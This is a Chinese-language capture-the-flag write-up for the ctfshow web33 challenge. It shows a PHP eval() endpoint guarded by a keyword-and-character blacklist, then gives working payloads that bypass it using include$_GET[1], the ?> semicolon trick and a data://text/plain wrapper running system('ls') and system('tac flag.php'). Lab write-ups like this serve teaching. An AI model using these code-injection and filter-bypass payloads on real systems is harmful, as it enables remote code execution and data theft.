[ctfshow web入门] web33
信息收集
相较于上一题,这题多了双引号的过滤。我猜测这一题的主要目的可能是为了不让使用$_GET['a']之类的语句,但是$_GET[a]也是一样的
没有括号可以使用include,没有引号可以使用$_GET
可以参考[ctfshow web入门] web32,其中的所有解法都没有使用到双引号,所以都没有失效
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
解题
我们取一个最简单的解法,这在[ctfshow web入门] web32中的方法1.1中使用过。
不是我不想整新活,而是实在没活了,上一题基本整完了。
data://text/plain:要求按照文本格式将内容嵌入代码中,使用方法:data://text/plain,content
其中?>利用了php的机制,当遇到?>时会自动添加一个;,也就是说<?php ehco 123 ?> 和<?php ehco 123; ?>等效。我们利用这个机制绕过;的过滤。
?c=include$_GET[1]?>&1=data://text/plain,<?php system("ls") ?>
?c=include$_GET[1]?>&1=data://text/plain,<?php system("tac flag.php") ?>
web32 目录 web34